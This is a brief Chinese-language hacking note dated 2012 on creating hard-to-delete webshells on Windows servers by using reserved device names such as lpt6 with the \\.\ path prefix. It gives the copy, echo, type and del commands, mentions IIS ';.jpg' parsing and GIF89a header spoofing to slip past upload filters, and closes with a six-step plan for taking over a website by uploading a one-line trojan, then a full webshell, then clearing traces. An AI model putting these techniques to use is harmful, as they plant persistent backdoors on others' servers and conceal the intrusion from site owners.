畸形文件
利用系统保留文件名创建无法删除的webshell2012/11/20 04:14 P.M.Windows 下不能够以下面这些字样来命名文件/文件夹:
aux|prn|con|nul|com1|com2|com3|com4|com5|com6|com7|com8|com9|lpt1|lpt2|lpt3|lpt4|lpt5|lpt6|lpt7|lpt8|lpt9
但是通过cmd的copy命令即可实现:
创建时。可试着用引号
D:\wwwroot>copy rootkit.asp \\.\D:\wwwroot\lpt6.80sec.asp 前面必须有 \\.\
删除记得引号。
E:\>del “\\.\E:\lpt4.xj.asp;.jpg”
写入内容
echo hello>\\.\E:\lpt4.xj.asp;.jpg
显示内容
type \\.\E:\lpt4.xj.asp;.jpg
方法。理解。
加\\.\
加..\
加""
特殊BUG渠道
查看可用ren 更名。然后查看内容。
eve 方法。执行语句。注意各大上传入口。只要上传这一句。就可以拿下网站。
Gif89a 语句欺骗IIS 解析成图片。
黑方法。
1.准备大马。
2.准备扫描。
3.突破口找到,上传一句话木马。
4.头欺骗。绕过上传过滤。制作上传入口。可利用一句话木马创建
5.上传大马。
6.清理痕迹。